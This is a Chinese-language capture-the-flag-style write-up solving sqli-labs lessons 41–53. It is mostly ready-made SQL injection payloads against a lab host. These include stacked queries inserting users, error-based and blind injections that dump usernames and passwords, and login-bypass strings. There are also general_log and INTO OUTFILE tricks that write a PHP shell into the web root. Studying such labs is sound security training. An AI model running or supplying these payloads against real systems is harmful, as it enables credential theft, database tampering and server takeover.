sqlilab-Less-41-53-writeup
Less-41 堆叠查询注入 整数不回显
此关卡和Less-39是一样的,只是不能回显
?id=1;insert into users(username,password) values ('bmf9998','shit');
?id=1;set global general_log = "ON";set global general_log_file='/var/www/html/Less-41/shell.php';--+
Less-42 堆叠查询注入POST请求 显错
此关卡因为在输入密码处没有个过滤,可以通过万能密码,常规的报错,联合查询注入,同时也支持跟Less-24类似的二次注入,本关卡目的是考察POST请求的堆叠查询
报错注入
POST /Less-42/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-42/index.php
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
login_user=admin&login_password=bmfx ' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#&mysubmit=Login
输入密码处万能密码登录
shit' or 998#
堆叠查询注入
POST /Less-42/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-42/index.php
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
login_user=admin&login_password=bmfx'; insert into users(username,password) values ('bmfd998998','shit');#&mysubmit=Login
其他几种我就不演示了,在输入密码处操作即可
Less-43 堆叠查询注入POST请求 显错 加括号
此关卡跟Less-42是一样的,也是输入密码处没有过滤,只是闭合方式加了括号
报错注入
POST /Less-43/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-43/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 252
login_user=admin&login_password=bmfx') AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#&mysubmit=Login
万能密码登录
shit') or 998#
堆叠查询注入
POST /Less-43/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-43/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
login_user=admin&login_password=bmfx'); insert into users(username,password) values ('bmfd77878','shit');#&mysubmit=Login
Less-44 堆叠查询注入POST请求 盲注
此关卡跟Less-43是一样的,没有报错注入
堆叠查询注入
POST /Less-44/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-44/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
login_user=admin&login_password=bmfx';insert into users(username,password) values ('bmfx44333','shit');#&mysubmit=Login
Less-45 堆叠查询注入POST请求 盲注 加括号
此关卡跟Less-43的闭合方式是一样的,没有报错注入
堆叠查询注入
POST /Less-45/login.php HTTP/1.1
Host: 106.54.35.126
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://106.54.35.126/Less-45/
Cookie: PHPSESSID=a914e467b5219eaf95dbb5db529e56ca
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
login_user=admin&login_password=bmfx'); insert into users(username,password) values ('bmfx0925','shit');#&mysubmit=Login
Less-46 Order by显错注入
验证方式
升序和降序
升序:?sort=1 asc 显示排序后的信息,显示正常
降序:?sort=1 dasc 显示异常报错
rand()验证
?sort=rand(true)
?sort=rand(false)
上述执行成功,true和false执行的结果是不一样的
或者
?sort=rand() 随机显示每次都不一样
?sort=1 and rand() 显示一次,之后每次都一样
利用上述的区别来判断验证
延时验证
?sort=sleep(1)
?sort=(sleep(1))
?sort=1 and sleep(1)
这个我测试的时候,容易把数据库卡死,原因可能是延时的时间为 (行数*1) 秒,写的是延时1秒实际如果数据库内容信息比较多的话,那么时间就会很长
报错注入
updatexml方式
?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23
正常SQL查询
?sort=1+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
procedure analyse方式
?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
布尔型盲注
?sort=rand(left(database(),1)>'r')
?sort=rand(left(database(),1)>'s')
时间延时盲注
?sort=rand(if(ascii(substr(database(),1,1))>114,1,sleep(1)))
?sort=rand(if(ascii(substr(database(),1,1))>115,1,sleep(1)))
into outfile 导入文件
?sort=1 into outfile "/var/www/html/Less-46/less46.txt"
通过导入文件getshell
?sort=1 into outfile "/var/www/html/Less-46/less46.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e
上述的 3c3f70687020706870696e666f28293b3f3e是<php phpinfo();>的16进制
在线转换:https://www.bejson.com/convert/ox2str/
Less-47 Order by单引号显错注入 单引号
此关卡跟Less-46注入方式一样,只是增加了单引号
报错注入
updatexml方式
?sort=1' and updatexml(1,concat(0x7e,(select version()),0x7e),1) %23
正常查询注入
?sort=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
procedure analyse方式
?sort=1' procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+
Less-48 Order by单引号显错注入 盲注
此关卡跟Less-46一样,只是本关卡是盲注,那么就不能使用报错注入
?sort=1 into outfile "/var/www/html/Less-48/less48.txt"
Less-49 Order by单引号显错注入 盲注
此关卡跟Less-46一样,不能使用报错注入
写文件
?sort=1' into outfile "/var/www/html/Less-49/less49.txt"
延时注入
?sort=' rand(if(ascii(substr(database(),1,1))=115,1,sleep(10)))
Less-50 Order by注入 整型
此关卡跟Less-46一样,同时将原来的查询mysql_query改成了mysqli_multi_query,所以支持堆叠注入,堆叠注入看下Less-38即可
?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23
Less-51 Order by注入 单引号
此关卡跟Less-50一样,就是需要加单引号来闭合
?sort=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23
Less-52 Order by注入 盲注 整型
跟Less-50的情况一样,少了报错注入,可以使用布尔型和时间延时盲注
?sort=rand(if(ascii(substr(database(),1,1))>114,1,sleep(1)))
?sort=rand(if(ascii(substr(database(),1,1))>115,1,sleep(1)))
?sort=1 and if(length(database())=8,sleep(5),0) --+
Less-53 Order by注入 盲注 单引号
?sort=4' and if(length(database()) = 8 ,0,sleep(6)) --+
?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
?sort=1' and (ascii(substr((select database()) ,1,1))) = 114 and if(1=1, sleep(1), null) and '1'='1
